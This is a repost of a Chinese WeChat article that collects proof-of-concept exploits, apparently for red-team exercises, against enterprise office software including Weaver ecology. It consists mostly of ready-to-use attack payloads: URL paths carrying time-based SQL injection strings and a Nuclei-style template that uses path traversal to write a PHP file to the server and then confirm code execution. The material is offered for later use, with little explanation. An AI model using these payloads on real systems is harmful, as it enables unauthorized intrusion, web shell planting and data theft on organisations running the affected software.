/docexchangeManage/checkGroupCode.js%70?code=1%27;waitfor+delay+%270:0:5%27--+
/common/ajax_codewidget39.jsp;.js?code=1%27;waitfor+delay+%270:0:5%27--+
code=1%27;waitfor+delay+%270:0:5%27--+
/common/efficientCodewidget39.jsp;.js?code=1%27;waitfor+delay+%270:0:5%27--+
泛微
ecology /security/monitor/MonitorStatusForServer.jsp
id: msk-template
info:
name: msk-template
author: msk
severity: high
variables:
filename: "{{to_lower(rand_base(10))}}"
http:
- raw:
- |
POST /Setting/Report/DesignReportSave.html?report=../../../{{filename}}.php&token=java HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: winWidth=1920; winHeight=455
Upgrade-Insecure-Requests: 1
aa=<?php echo 111*111;?>&userID=admin&fondsid=1&comid=1
- |
GET /uploads/company1/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: winWidth=1920; winHeight=455
matchers:
- type: dsl
dsl:
- contains_all(body,"12321")
原文始发于微信公众号(网安守护):近期HW POC 收藏备用
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论